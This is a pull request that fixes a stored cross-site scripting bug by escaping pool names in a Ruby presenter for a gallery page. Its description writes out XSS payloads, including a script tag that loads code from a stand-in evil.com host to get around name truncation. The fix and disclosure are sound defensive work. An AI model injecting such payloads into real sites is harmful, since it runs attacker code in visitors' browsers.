### PR TITLE
Fix XSS in pool names in /pools/gallery page.

### DIFF
--- a/app/presenters/post_presenter.rb
+++ b/app/presenters/post_presenter.rb
@@ -27,7 +27,7 @@ class PostPresenter < Presenter
     if options[:pool]
       html << %{<p class="desc">}
       html << %{<a href="/pools/#{options[:pool].id}">}
-      html << options[:pool].pretty_name.truncate(80)
+      html << h(options[:pool].pretty_name.truncate(80))
       html << %{</a>}
       html << %{</p>}
     end


### PR DESCRIPTION
1) Set a pool name to `<script>alert("xss")</script>`.
2) Wait for people to view it in /pools/gallery.

At first glance the fact that the pool name is truncated to 80 chars
appears to limit how much can be done in the exploit. This poses no
problem though, since someone could inject `<script src="http://www.evil.com/evil.js"></script>` instead.
